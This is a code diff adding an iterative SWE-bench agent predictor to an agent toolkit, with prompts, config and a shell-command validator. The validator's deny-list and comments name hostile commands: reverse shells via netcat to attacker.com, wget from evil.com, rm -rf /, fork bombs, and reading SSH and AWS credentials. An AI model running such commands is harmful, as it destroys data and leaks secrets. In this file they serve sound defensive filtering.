diff --git a/examples/evaluation_and_profiling/swe_bench/README.md b/examples/evaluation_and_profiling/swe_bench/README.md
index 155cbcddbb..09efbf0d0e 100644
--- a/examples/evaluation_and_profiling/swe_bench/README.md
+++ b/examples/evaluation_and_profiling/swe_bench/README.md
@@ -159,6 +159,18 @@ That information is only used for evaluation. Using it can taint the predictor a
 These predictors are provided in this NeMo Agent Toolkit example:
 - `gold` - Uses the patch from the `SWEBenchInput` instance, bypassing problem-solving logic. See [predict_gold_stub.py](src/nat_swe_bench/predictors/predict_gold/predict_gold_stub.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_gold.yml`.
 - `skeleton` - Skeleton code for creating a problem-solving workflow. This code can be copied to create a net-new predictor. See [predict_skeleton.py](src/nat_swe_bench/predictors/predict_skeleton/predict_skeleton.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_skeleton.yml`.
+- `iterative` - An iterative agent that solves problems by executing bash commands step by step, observing the results, and generating a patch. See [predict_iterative.py](src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_iterative.yml`.
+
+### Benchmark Context (January 2026)
+
+The iterative predictor achieves a 70% success rate on SWE-bench Lite, which primarily reflects the capabilities of modern foundation models (Claude Sonnet 4.5, GPT-5.2) rather than framework-specific innovations. SWE-bench Lite is approaching saturation, with simple agent architectures reaching 70-80%.
+
+**For evaluating framework improvements beyond task correctness, consider tracking:**
+- **Efficiency metrics:** Tokens consumed, steps taken, and cost per solution
+- **Reliability metrics:** Variance in success rate across multiple runs
+- **Harder benchmarks:** SWE-bench Verified (currently ~35% SOTA, not saturated) or the full SWE-bench dataset (2,294 problems)
+
+This positions the iterative predictor as a reference implementation that demonstrates the NeMo Agent Toolkit builder pattern and tool integration capabilities.
 
 ### Adding a net new predictor
 To add a new predictor:
diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py
index d6f5b60a67..7352d9ade7 100644
--- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py
+++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py
@@ -16,31 +16,59 @@
 import typing
 
 from pydantic import Discriminator
+from pydantic import Field
 from pydantic import Tag
 
 from nat.data_models.common import BaseModelRegistryTag
 from nat.data_models.common import TypedBaseModel
+from nat.data_models.component_ref import LLMRef
 from nat.data_models.function import FunctionBaseConfig
 
 
 class SweBenchPredictorBaseConfig(TypedBaseModel, BaseModelRegistryTag):
+    """Base configuration class for SWE-bench predictors."""
     description: str = "Swe Bench Problem Solver"
 
 
 class SweBenchPredictorGoldConfig(SweBenchPredictorBaseConfig, name="gold"):
+    """Configuration for the gold predictor that uses the provided patch directly.
+
+    Attributes:
+        verbose: Whether to enable verbose output for debugging.
+    """
     verbose: bool = True
 
 
 class SweBenchPredictorSkeletonConfig(SweBenchPredictorBaseConfig, name="skeleton"):
+    """Configuration for the skeleton predictor template.
+ + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = False +class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterative"): + """Configuration for the iterative predictor that solves problems step-by-step. + + Attributes: + llm_name: Reference to the LLM to use for iterative problem solving. + step_limit: Maximum number of agent steps before termination. + timeout: Command execution timeout in seconds. + """ + llm_name: LLMRef = Field(description="LLM to use for iterative agent") + step_limit: int = Field(default=250, description="Maximum number of agent steps") + timeout: int = Field(default=60, description="Command execution timeout in seconds") -SweBenchPredictorConfig = typing.Annotated[typing.Annotated[SweBenchPredictorGoldConfig, - Tag(SweBenchPredictorGoldConfig.static_type())] - | typing.Annotated[SweBenchPredictorSkeletonConfig, - Tag(SweBenchPredictorSkeletonConfig.static_type())], - Discriminator(TypedBaseModel.discriminator)] - +SweBenchPredictorConfig = typing.Annotated[ + typing.Annotated[SweBenchPredictorGoldConfig, Tag(SweBenchPredictorGoldConfig.static_type())] + | typing.Annotated[SweBenchPredictorSkeletonConfig, Tag(SweBenchPredictorSkeletonConfig.static_type())] + | typing.Annotated[SweBenchPredictorIterativeConfig, Tag(SweBenchPredictorIterativeConfig.static_type())], + Discriminator(TypedBaseModel.discriminator)] class SweBenchWorkflowConfig(FunctionBaseConfig, name="swe_bench"): + """Configuration for the SWE-bench workflow. + + Attributes: + predictor: The predictor configuration (gold, skeleton, or iterative). + """ predictor: SweBenchPredictorConfig diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml new file mode 100644 index 0000000000..71101f98fa --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -0,0 +1,78 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
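+
+# Example invocation (an illustrative sketch; assumes the toolkit's standard
+# `nat eval` entry point and that this example package is installed):
+#
+#   nat eval --config_file <path/to/config_iterative.yml>
+#
+# The `llm_name` under `workflow.predictor` must match a key defined in `llms:` below.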
+ +llms: + nim_llm: + _type: nim + model_name: nvidia/nemotron-3-nano-30b-a3b + temperature: 0.0 + max_tokens: 4096 + claude_sonnet_llm: + _type: litellm + model_name: anthropic/claude-sonnet-4-5-20250929 + temperature: 0.0 + api_key: "${ANTHROPIC_API_KEY}" + openai_llm: + _type: openai + model_name: gpt-5.2 + temperature: 0.0 + api_key: "${OPENAI_API_KEY}" + +workflow: + _type: swe_bench + predictor: + _type: iterative + llm_name: "openai_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" + step_limit: 100 # Overrides default (250) + timeout: 60 + +functions: + git_repo_tool: + _type: git_repo_tool + workspace_dir: "./.workspace" + cleanup_on_exit: true + +eval: + general: + output_dir: .tmp/nat/examples/evaluation_and_profiling/swe_bench/iterative/ + max_concurrency: 5 + dataset: + _type: parquet + file_path: hf://datasets/princeton-nlp/SWE-bench_Lite/data/test-00000-of-00001.parquet + id_key: instance_id + structure: + disable: true + filter: + allowlist: + field: + instance_id: + - sympy__sympy-20590 + # - sympy__sympy-21055 + # - sympy__sympy-11400 + # - astropy__astropy-12907 + # - django__django-15781 + # - astropy__astropy-6938 + # - django__django-11001 + # - mwaskom__seaborn-3010 + # - pallets__flask-4045 + # - psf__requests-1963 + + evaluators: + swe_bench: + _type: swe_bench + run_id: nat_iterative_1 + clean: true + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py new file mode 100644 index 0000000000..7faa3b0ca9 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. \ No newline at end of file diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py new file mode 100644 index 0000000000..bc8574f507 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -0,0 +1,601 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+Iterative agent-based predictor for SWE-bench problems.
+
+This predictor implements a step-by-step approach where the agent:
+1. Receives a problem statement
+2. Executes bash commands iteratively
+3. Observes results and adjusts strategy
+4. Generates a patch using git diff
+
+The iterative loop and prompts are inspired by mini-swe-agent, adapted for the NeMo Agent Toolkit.
+"""
+
+import asyncio
+import json
+import logging
+import re
+import subprocess
+import time
+from dataclasses import dataclass
+from pathlib import Path
+
+from git.exc import GitCommandError
+from langchain_core.messages import AIMessage
+from langchain_core.messages import HumanMessage
+from langchain_core.messages import SystemMessage
+from rich.console import Console
+
+from nat.builder.builder import Builder
+from nat.builder.framework_enum import LLMFrameworkEnum
+from nat.data_models.swe_bench_model import SWEBenchInput
+from nat_swe_bench.config import SweBenchWorkflowConfig
+from nat_swe_bench.predictors.predict_abc import SweBenchPredictorBase
+from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command
+from nat_swe_bench.predictors.predictor_registry import register_predictor
+
+logger = logging.getLogger(__name__)
+
+console = Console(highlight=False)
+
+
+class NonTerminatingException(Exception):
+    """Raised for conditions that can be handled by the agent."""
+
+
+class TerminatingException(Exception):
+    """Raised for conditions that terminate the agent."""
+
+
+class FormatError(NonTerminatingException):
+    """Raised when the LLM's output is not in the expected format."""
+
+
+class ExecutionTimeoutError(NonTerminatingException):
+    """Raised when the action execution timed out."""
+
+
+class Submitted(TerminatingException):
+    """Raised when the agent has finished its task."""
+
+
+class LimitsExceeded(TerminatingException):
+    """Raised when the agent has reached its step limit."""
+
+
+@dataclass
+class IterativeAgentConfig:
+    """Configuration for the iterative agent."""
+    step_limit: int = 250
+    timeout: int = 60
+    max_output_length: int = 10000
+
+
+class IterativeAgent:
+    """Iterative agent that executes commands step-by-step."""
+
+    # Timeout message template
+    _TIMEOUT_TEMPLATE = (
+        "The last command {action} timed out and has been killed.\n"
+        "The output of the command was:\n{output}\n\n"
+        "Please try another command and make sure to avoid those requiring interactive input."
+    )
+
+    # Output truncation warning message
+    _OUTPUT_TRUNCATION_WARNING = (
+        "\n\n"
+        "The output of your last command was too long.\n"
+        "Please try a different command that produces less output.\n"
+        "If you're looking at a file, you can try using head, tail, or sed to view a smaller number of lines selectively.\n"
+        "If you're using grep or find and it produced too much output, you can use a more selective search pattern.\n"
+        "If you really need to see something from the full command's output, you can redirect output to a file and then search in that file.\n"
+        "\n\n"
+    )
+
+    def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig):
+        self.llm = llm
+        self.repo_path = repo_path
+        self.config = config
+        self.messages: list = []
+        self.n_steps = 0
+        self.total_input_tokens = 0
+        self.total_output_tokens = 0
+
+    def add_message(self, role: str, content: str):
+        """Add a message to the conversation and print it for debugging.
+
+        Args:
+            role: The role of the message sender. Must be one of:
+                "system", "user", "human", "assistant", or "ai".
+            content: The message content to add.
+
+        Raises:
+            ValueError: If role is not a recognized value.
+        """
+        if role == "system":
+            msg = SystemMessage(content=content)
+            self.messages.append(msg)
+            console.print(f"\n[bold blue]System[/bold blue] (step {self.n_steps}):\n", end="", highlight=False)
+        elif role in ("user", "human"):
+            msg = HumanMessage(content=content)
+            self.messages.append(msg)
+            console.print(f"\n[bold green]User[/bold green] (step {self.n_steps}):\n", end="", highlight=False)
+        elif role in ("assistant", "ai"):
+            msg = AIMessage(content=content)
+            self.messages.append(msg)
+            console.print(f"\n[bold red]Assistant[/bold red] (step {self.n_steps}):\n", end="", highlight=False)
+        else:
+            raise ValueError(f"Unknown role: {role}")
+
+        # Print content
+        console.print(content, highlight=False, markup=False)
+
+    def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]:
+        """Build system and instance prompts customized for SWE-bench.
+
+        Args:
+            task: The task description/PR description.
+            repo_path: Path to the repository being worked on.
+
+        Returns:
+            A tuple of (system_prompt, instance_prompt) strings.
+        """
+        # Convert Path to string for template usage
+        repo_path_str = str(repo_path)
+
+        system_template = """You are a helpful assistant that can interact multiple times with a computer shell to solve programming tasks.
+Your response must contain exactly ONE bash code block with ONE command (or commands connected with && or ||).
+
+Include a THOUGHT section before your command where you explain your reasoning process.
+Format your response as shown in the example below.
+
+
+THOUGHT: Your reasoning and analysis here
+
+```bash
+your_command_here
+```
+
+
+Failure to follow these rules will cause your response to be rejected."""
+
+        instance_template = f"""
+Consider the following PR description:
+{task}
+
+
+
+# Task Instructions
+
+## Overview
+You're a software engineer interacting continuously with a computer by submitting commands.
+You'll be helping implement necessary changes to meet requirements in the PR description.
+Your task is specifically to make changes to non-test files in the current directory in order to fix the issue described in the PR description in a way that is general and consistent with the codebase.
+
+IMPORTANT: This is an interactive process where you will think and issue ONE command, see its result, then think and issue your next command.
+
+For each response:
+1. Include a THOUGHT section explaining your reasoning and what you're trying to accomplish
+2. Provide exactly ONE bash command to execute
+
+## Important Boundaries
+- MODIFY: Regular source code files in {repo_path_str} (this is the working directory for all your subsequent commands)
+- DO NOT MODIFY: Tests, configuration files (pyproject.toml, setup.cfg, etc.)
+
+## Recommended Workflow
+1. Analyze the codebase by finding and reading relevant files
+2. Create a script to reproduce the issue
+3. Edit the source code to resolve the issue
+4. Verify your fix works by running your script again
+5. Test edge cases to ensure your fix is robust
+6. Clean up any temporary files you created (test scripts, plans, summaries, etc.)
+
+## Command Execution Rules
+You are operating in an environment where:
+1. You write a single command
+2. The system executes that command in a subshell
+3. You see the result
+4. You write your next command
+
+Each response should include:
+1. A **THOUGHT** section where you explain your reasoning and plan
+2. A single bash code block with your command
+
+Format your responses like this:
+
+
+THOUGHT: Here I explain my reasoning process, analysis of the current situation,
+and what I'm trying to accomplish with the command below.
+
+```bash
+your_command_here
+```
+
+
+Commands must be specified in a single bash code block:
+
+```bash
+your_command_here
+```
+
+**CRITICAL REQUIREMENTS:**
+- Your response SHOULD include a THOUGHT section explaining your reasoning
+- Your response MUST include EXACTLY ONE bash code block
+- This bash block MUST contain EXACTLY ONE command (or a set of commands connected with && or ||)
+- If you include zero or multiple bash blocks, or no command at all, YOUR RESPONSE WILL FAIL
+- Do NOT try to run multiple independent commands in separate blocks in one response
+- Directory or environment variable changes are not persistent. Every action is executed in a new subshell.
+- However, you can prefix any action with `MY_ENV_VAR=MY_VALUE cd /path/to/working/dir && ...` or write/load environment variables from files
+
+Example of a CORRECT response:
+
+THOUGHT: I need to understand the structure of the repository first. Let me check what files are in the current directory to get a better understanding of the codebase.
+
+```bash
+ls -la
+```
+
+
+Example of an INCORRECT response:
+
+THOUGHT: I need to examine the codebase and then look at a specific file. I'll run multiple commands to do this.
+
+```bash
+ls -la
+```
+
+Now I'll read the file:
+
+```bash
+cat file.txt
+```
+
+
+If you need to run multiple commands, either:
+1. Combine them in one block using && or ||
+```bash
+command1 && command2 || echo "Error occurred"
+```
+
+2. Wait for the first command to complete, see its output, then issue the next command in your following response.
+
+## Environment Details
+- You have a full Linux shell environment
+- Always use non-interactive flags (-y, -f) for commands
+- Avoid interactive tools like vi, nano, or any that require user input
+- If a command isn't available, you can install it
+
+## Useful Command Examples
+
+### Create a new file:
+```bash
+cat <<'EOF' > newfile.py
+import numpy as np
+hello = "world"
+print(hello)
+EOF
+```
+
+### Edit files with sed:
+```bash
+# Replace all occurrences
+sed -i 's/old_string/new_string/g' filename.py
+
+# Replace only first occurrence
+sed -i 's/old_string/new_string/' filename.py
+
+# Replace first occurrence on line 1
+sed -i '1s/old_string/new_string/' filename.py
+
+# Replace all occurrences in lines 1-10
+sed -i '1,10s/old_string/new_string/g' filename.py
+```
+
+### View file content:
+```bash
+# View specific lines with numbers
+nl -ba filename.py | sed -n '10,20p'
+```
+
+### Any other command you want to run
+```bash
+anything
+```
+
+## Submission
+When you've completed your work (reading, editing, testing) and cannot make further progress,
+issue exactly the following command:
+
+```bash
+echo COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached
+```
+
+This command will submit your work.
+You cannot continue working (reading, editing, testing) in any way on this task after submitting.
+"""
+
+        return system_template, instance_template
+
+    async def run(self, task: str) -> tuple[str, str]:
+        """Run the iterative agent loop until completion.
+
+        Executes commands step-by-step, observing results and adjusting strategy
+        until the task is completed or limits are exceeded.
+
+        Args:
+            task: The task description to solve.
+ + Returns: + A tuple of (exit_status, result) where exit_status is either + "Submitted" or "LimitsExceeded", and result is the patch or error message. + """ + system_template, instance_template = self._build_prompts(task, self.repo_path) + + self.messages = [] + self.add_message("system", system_template) + self.add_message("user", instance_template) + + start_time = time.perf_counter() + + while True: + try: + # Check limits + if 0 < self.config.step_limit <= self.n_steps: + raise LimitsExceeded(f"Reached step limit: {self.config.step_limit}") + + self.n_steps += 1 + + response = await self._query_llm() + observation = await self._execute_action(response) + + # Check if completed + if "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT" in observation: + # Extract patch from git diff output + patch_lines = observation.split("\n", 1) + if len(patch_lines) > 1: + patch = patch_lines[1] + raise Submitted(patch) + raise Submitted(observation) + + self.add_message("user", f"Observation:\n{observation}") + + except NonTerminatingException as e: + # Recoverable errors: add error message and continue + self.add_message("user", str(e)) + except TerminatingException as e: + # Log summary and return + elapsed = time.perf_counter() - start_time + exit_status = type(e).__name__ + logger.info( + "\nAgent finished: steps=%d, tokens=%d/%d, time=%.1fs, status=%s", + self.n_steps, self.total_input_tokens, self.total_output_tokens, + elapsed, exit_status + ) + self.add_message("user", str(e)) + return exit_status, str(e) + + async def _query_llm(self) -> str: + """Query LLM and return response content. + + Returns: + The LLM response content as a string. + + Raises: + NonTerminatingException: If the LLM invocation fails. + """ + try: + response = await self.llm.ainvoke(self.messages) + content = response.content if hasattr(response, 'content') else str(response) + self.add_message("assistant", content) + + # Extract and accumulate token usage from response metadata + if hasattr(response, 'response_metadata'): + metadata = response.response_metadata + # OpenAI format + if 'token_usage' in metadata: + self.total_input_tokens += metadata['token_usage'].get('prompt_tokens', 0) + self.total_output_tokens += metadata['token_usage'].get('completion_tokens', 0) + # Anthropic format + elif 'usage' in metadata: + self.total_input_tokens += metadata['usage'].get('input_tokens', 0) + self.total_output_tokens += metadata['usage'].get('output_tokens', 0) + + return content + except Exception as e: + logger.error("LLM invocation failed: %s", e, exc_info=True) + raise NonTerminatingException(f"LLM call failed: {str(e)}") + + async def _execute_action(self, response: str) -> str: + """Parse action from response and execute it asynchronously. + + Args: + response: The LLM response containing a bash code block. + + Returns: + The command output including returncode. + + Raises: + FormatError: If the response doesn't contain exactly one bash block, + or if the command fails security validation. + ExecutionTimeoutError: If the command execution times out. + NonTerminatingException: If command execution fails unexpectedly. 
+ """ + # Extract bash command from response + action_regex = r"```bash\s*\n(.*?)\n```" + matches = re.findall(action_regex, response, re.DOTALL) + if len(matches) != 1: + error_msg = f"Expected exactly one bash command, found {len(matches)}" + raise FormatError(error_msg) + + command = matches[0].strip() + + # Validate command for security before execution + is_valid, error_msg = validate_command(command) + if not is_valid: + raise FormatError(f"Command blocked for security: {error_msg}") + + # Execute command using asyncio.to_thread to avoid blocking + def run_cmd(): + """Synchronous command execution function.""" + return subprocess.run( + command, + shell=True, + cwd=str(self.repo_path), + timeout=self.config.timeout, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, # stderr redirected to stdout + text=True, + encoding="utf-8", + errors="replace", + check=False, # Don't raise on non-zero exit; we handle return codes manually + ) + + try: + result = await asyncio.to_thread(run_cmd) + + # stderr is automatically redirected to stdout via stderr=subprocess.STDOUT + output = result.stdout if result.stdout else "" + + # Include returncode in the output so agent know action success or fail + output = f"{result.returncode}\n{output}" + + # Truncate long outputs + max_length = self.config.max_output_length + if len(output) > max_length: + elided_chars = len(output) - max_length + head_tail_length = max_length // 2 + output = ( + f"{output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{output[-head_tail_length:]}" + ) + output = self._OUTPUT_TRUNCATION_WARNING + output + + return output + + except (TimeoutError, subprocess.TimeoutExpired) as e: + # Extract output from exception if available (only subprocess.TimeoutExpired has output attribute) + if isinstance(e, subprocess.TimeoutExpired) and hasattr(e, "output") and e.output: + output = e.output if isinstance(e.output, str) else e.output.decode("utf-8", errors="replace") + else: + output = "" + # Format timeout message using template + timeout_message = self._TIMEOUT_TEMPLATE.format( + action=command, + output=output + ) + raise ExecutionTimeoutError(timeout_message) + except Exception as e: + raise NonTerminatingException(f"Error executing command: {str(e)}") + + +@register_predictor("iterative") +class SweBenchPredictor(SweBenchPredictorBase): + """Iterative agent-based predictor for SWE-bench.""" + + def __init__(self, config: SweBenchWorkflowConfig, builder: Builder): + super().__init__(config, builder) + self.git_tool = None + + async def predict_fn(self, swebench_input: SWEBenchInput) -> str: + """Generate patch using iterative agent approach. + + Args: + swebench_input: The SWE-bench problem instance to solve. + + Returns: + The generated patch as a string, or an error message if failed. + """ + logger.info("Processing instance %s with iterative agent", swebench_input.instance_id) + + # Setup repository + if self.git_tool is None: + self.git_tool = await self.builder.get_tool( + "git_repo_tool", + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + repo_name = swebench_input.instance_id.rsplit('-', 1)[0] # eg. 
scikit-learn__scikit-learn-14520 + org, repo = repo_name.split('__') + repo_url = f"https://github.com/{org}/{repo}" + + # Setup repo with instance_id for workspace isolation + try: + repo_path_str = await self.git_tool.arun(json.dumps({ + "operation": "setup", + "repo_url": repo_url, + "base_commit": swebench_input.base_commit, + "instance_id": swebench_input.instance_id # Isolate workspace per instance + })) + repo_path = Path(repo_path_str) + logger.info("Repository setup at %s", repo_path) + except GitCommandError as e: + logger.error("Git operation failed: %s", e, exc_info=True) + return f"Error: Git operation failed - {e.stderr}" + except OSError as e: + logger.error("Filesystem error: %s", e, exc_info=True) + return f"Error: Workspace setup failed - {str(e)}" + except Exception as e: + logger.exception("Unexpected error during repo setup: %s", e) + return f"Error: Setup failed - {str(e)}" + + try: + # Get LLM + llm = await self.builder.get_llm( + self.config.predictor.llm_name, + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + # Build task description + task = self._build_task_description(swebench_input) + + # Create agent config + agent_config = IterativeAgentConfig( + step_limit=getattr(self.config.predictor, 'step_limit', 250), + timeout=getattr(self.config.predictor, 'timeout', 60) + ) + + # Run iterative agent + agent = IterativeAgent(llm, repo_path, agent_config) + exit_status, patch = await agent.run(task) + + if exit_status == "Submitted": + logger.info("Agent completed successfully with patch") + return patch + else: + logger.warning(f"Agent exited with status: {exit_status}, result: {patch[:200] if patch else 'None'}") + return f"Error: {exit_status} - {patch}" + + except Exception as e: + logger.exception(f"Error processing {swebench_input.instance_id}: {e}") + return f"Error: {str(e)}" + + def _build_task_description(self, swebench_input: SWEBenchInput) -> str: + """Build task description from SWE-bench input. + + Args: + swebench_input: The SWE-bench problem instance. + + Returns: + Combined task description with problem statement and hints. + """ + parts = [swebench_input.problem_statement] + if swebench_input.hints_text: + parts.append(f"\nAdditional Context:\n{swebench_input.hints_text}") + return "\n".join(parts) + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py new file mode 100644 index 0000000000..1e7a70b5a5 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py @@ -0,0 +1,205 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Shell command validation for security. 
+ +This module provides pattern-based validation to block dangerous shell commands +and common bypass techniques that could be used to evade command filtering. +""" + +import re + +# Dangerous command patterns that should be blocked for security. +# Each tuple contains (compiled_regex, error_message). +DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Destructive system commands ===== + # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" + (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), + "Deleting root or home directory is not allowed"), + + # Examples: "rm -rf ..", "rm -rf ../important" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), + "Deleting parent directory is not allowed"), + + # Examples: "rm -rf *", "rm -rf ./*" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), + "Wildcard deletion is not allowed"), + + # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) + (re.compile(r'>\s*/dev/(?!null)'), + "Writing to device files is not allowed"), + + # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" + (re.compile(r'\bmkfs\b'), + "Formatting disks is not allowed"), + + # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" + (re.compile(r'\bfdisk\b'), + "Disk partitioning is not allowed"), + + # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" + (re.compile(r'\bdd\s+.*\bof=/dev/'), + "Writing to devices with dd is not allowed"), + + # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) + (re.compile(r'\bdd\s+.*\bif=/dev/'), + "Reading from devices with dd is not allowed"), + + # Fork bomb: :(){ :|:& };: + (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), + "Fork bomb detected"), + + # ===== Privilege escalation ===== + # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), + "sudo is not allowed"), + + # Examples: "doas rm file", "/usr/bin/doas cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), + "doas is not allowed"), + + # Examples: "pkexec rm file", "pkexec /bin/bash" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), + "pkexec is not allowed"), + + # Examples: "su root", "su - admin", "su -c 'command' user" + (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), + "su is not allowed"), + + # Examples: "chmod 777 /", "chmod -R 0777 /var" + (re.compile(r'\bchmod\s+[0-7]*777\b'), + "Setting 777 permissions is not allowed"), + + # Examples: "chown root file", "chown root:root /etc/passwd" + (re.compile(r'\bchown\s+root\b'), + "Changing ownership to root is not allowed"), + + # ===== Sensitive file access ===== + # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" + (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), + "Accessing sensitive system files is not allowed"), + + # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" + (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), + "Reading sensitive credential files is not allowed"), + + # ===== Arbitrary code download and network exfiltration ===== + # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" + (re.compile(r'\bwget\s+.*https?://'), + "Downloading from URLs with wget is not allowed"), + + # Examples: "curl http://evil.com/script.sh", "curl -O https://..." 
+ (re.compile(r'\bcurl\s+.*https?://'), + "Downloading from URLs with curl is not allowed"), + + # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" + (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), + "Netcat reverse shell is not allowed"), +] + + +# Shell metacharacter bypass patterns that could be used to evade command-based filtering. +# These detect attempts to chain, substitute, or obfuscate commands using shell features. +# Each tuple contains (compiled_regex, error_message). +BYPASS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Command substitution ===== + # Attackers can use $() or backticks to dynamically construct blocked commands. + # Examples: "$(cat /etc/shadow)", "$(echo rm -rf /)", "`whoami`", "`sudo reboot`" + (re.compile(r'\$\([^)]+\)|`[^`]+`'), + "Command substitution ($() or backticks) is not allowed"), + + # ===== Piping to shell interpreters ===== + # Attackers can pipe malicious commands to shell interpreters to bypass direct command checks. + # Examples: "echo 'rm -rf /' | bash", "cat script.sh | sh", "curl url | python" + (re.compile(r'\|\s*(?:bash|sh|zsh|ksh|dash|fish|python[23]?|perl|ruby|node)\b'), + "Piping to shell interpreter is not allowed"), + + # ===== Base64 encoded command execution ===== + # Attackers can encode malicious commands in base64 to evade pattern matching. + # Examples: "echo 'cm0gLXJmIC8=' | base64 -d | bash", "base64 -d script.b64 | sh" + (re.compile(r'base64\s+(-d|--decode).*\|\s*(?:bash|sh|zsh|python|perl)'), + "Base64 decode to shell execution is not allowed"), + + # ===== Eval and exec execution ===== + # Eval/exec can execute arbitrary strings as commands, bypassing static analysis. + # Examples: "eval 'rm -rf /'", "eval $(cat cmd.txt)", "exec rm -rf /" + 